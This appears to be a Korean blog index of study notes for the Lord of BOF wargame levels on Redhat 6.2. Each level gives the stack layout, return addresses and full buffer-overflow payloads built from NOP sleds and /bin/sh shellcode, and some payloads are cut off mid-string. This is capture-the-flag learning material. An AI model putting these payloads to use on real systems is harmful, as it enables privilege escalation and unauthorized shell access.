Wargames/Load Of BOF 썸네일형 리스트형 LOB Redhat 6.2 - vampire vampire - argv hunterStack : saved_argc[4] + i[4] + buffer[40] + sfp[4] + ret[4] + Program name Symbolic Link : ln -s skeleton `python -c 'print "\x90"*100 + "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xb.. 더보기 LOB Redhat 6.2 - troll troll - check 0xbfffStack : buffer[40] + sfp[4] + ret[4] + Environment VariableDummy : export dummy=`python -c 'print "A"*80000'`return address : 0xbffec3b9Payload : ./vampire `python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\xb9\xc3\xfe\xbf"'` Using argv[1] address + Environment Variable Dummy 더보기 LOB Redhat 6.2 - orge orge - check argc + argv hunterStack : i[4] + buffer[40] + sfp[4] + ret[4]Symbolic Link : ln -s troll `python -c 'print "\x90"*100 + "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51.. 더보기 LOB Redhat 6.2 - darkelf darkelf - check argv[0]Stack : i[4] + buffer[40] + sfp[4] + ret[4]./orge == ./////////////orgereturn address : 0xbffffc33 - 71 = 0xbffffbacPayload : .`python -c 'print "/"*72 + "orge"'` `python -c 'print "A"*44 + "\xac\xfb\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'` Using argv[2] address 더보기 LOB Redhat 6.2 - wolfman wolfman - egghunter + buffer hunter + check length of argv[1]Stack : i[4] + buffer[40] + sfp[4] + ret[4]return address : 0xbffffbfcPayload : ./darkelf `python -c 'print "A"*44 + "\xfc\xfb\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'` Using argv[2] address 더보기 LOB Redhat 6.2 - orc orc - egghunter + buffer hunterStack : i[4] + buffer[40] + sfp[4] + ret[4]return address : 0xbffffc44Payload : ./wolfman `python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x44\xfc\xff\xbf"'` Using argv[1] address 더보기 LOB Redhat 6.2 - goblin goblin - egghunterStack : i[4] + buffer[40] + sfp[4] + ret[4]return address : 0xbffffc01Payload : ./orc `python -c 'print "A"*44 + "\x01\xfc\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'` Using buffer address 더보기 LOB Redhat 6.2 - cobolt cobolt - small buffer + stdinStack : buffer[16] + sfp[4] + ret[4]return address : 0xbffffeb9Payload : (python -c 'print "A"*20 + "\xb9\xfe\xff\xbf"';cat) | ./goblinEnvironment Variable : export shell=`python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`getenv.c : Using Environment Variable 더보기 LOB Redhat 6.2 - gremlin *이 글은 절대 강좌글이 아니라 본인이 공부한 내용을 정리하고 적어놓은 글임을 알립니다 gremlin - small bufferStack : buffer[16] + sfp[4] + ret[4]return address : 0xbffffbeePayload : ./cobolt `python -c 'print "A"*20 + "\xee\xfb\xff\xbf" + "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'` Using argv[1] address 더보기 LOB Redhat 6.2 - gate gate - simple BOFStack : buffer[256] + sfp[4] + ret[4]return address : 0xbffff928Payload : ./gremlin `python -c 'print "\x90"*137 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x90"*100 + "\x28\xf9\xff\xbf"'` Using buffer address 더보기 이전 1 2 다음
